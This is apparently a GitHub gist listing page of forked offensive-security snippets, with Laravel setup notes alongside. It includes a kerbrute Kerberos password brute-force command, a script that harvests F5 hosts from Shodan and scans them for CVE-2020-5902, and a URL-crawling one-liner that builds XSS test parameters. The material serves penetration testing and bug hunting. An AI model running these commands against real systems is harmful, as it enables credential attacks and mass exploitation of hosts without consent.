With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
vishal9066
/ kerberos_attacks_cheatsheet.md
Created
June 2, 2020 20:02
— forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks
vishal9066
/ WAHH_Task_Checklist.md
Last active
June 22, 2020 18:55
— forked from jhaddix/Testing_Checklist.md
The Web Application Hacker's Handbook - Task Checklist - Github-Flavored Markdown
Web Application Hacker's Handbook Task checklist as a Github-Flavored Markdown file
vishal9066
/ f5_here_i_come.sh
Created
July 6, 2020 14:20
— forked from LuD1161/f5_here_i_come.sh
F5 Slapdash attempt
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Get all the F5 IPs from Shodan | Get script here : https://gist.github.com/LuD1161/2087aea80e8771a4af069c33b4078570 | |
| python3 shodan_query.py "http.favicon.hash:-335242539" results_f5.txt | tee -a output.txt | |
| cat output.txt | grep -i "host :" | cut -d":" -f2 | cut -d" " -f2 | httpx -threads 400 -ports 80,443,8443,4443 -silent | nuclei -t cves/CVE-2020-5902.yaml -o results.txt | |
| interlace -tL ./targets.txt -threads 100 -c "echo _target_; curl --insecure -v _target_ 2>&1 | awk 'BEGIN { cert=0 } /^\* SSL connection/ { cert=1 } /^\*/ { if (cert) print }'" -v | tee -a all_certs.txt | |
| grep 'issuer: ' all_certs.txt | grep -v 'root@localhost.localdomain' |
vishal9066
/ find js file one liner
Created
September 1, 2020 11:04
— forked from dwisiswant0/find js file one liner
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| assetfinder site.com | gau|egrep -v '(.css|.png|.jpeg|.jpg|.svg|.gif|.wolf)'|while read url; do vars=$(curl -s $url | grep -Eo "var [a-zA-Zo-9_]+" |sed -e 's, 'var','"$url"?',g' -e 's/ //g'|grep -v '.js'|sed 's/.*/&=xss/g'):echo -e "\e[1;33m$url\n" "\e[1;32m$vars";done |
vishal9066
/ laravel_xampp_setup.md
Created
May 15, 2022 16:54
— forked from bradtraversy/laravel_xampp_setup.md
Laravel Xampp setup on Mac and Windows
Install Xampp from https://www.apachefriends.org/index.html
- Run the Xampp installer and open the Xampp control panel
- Make sure that you enable the Apache and MySQL services
- On mac you need to click "Start" on the Home tab, "Enable" on the Network tab and "Mount" on the Location Tab. Click "Explore" on the location tab to open your Xampp/Lampp folder
vishal9066
/ Mobile Pentesting Resources.md
Created
July 25, 2022 17:43
— forked from OTaKuHP/Mobile Pentesting Resources.md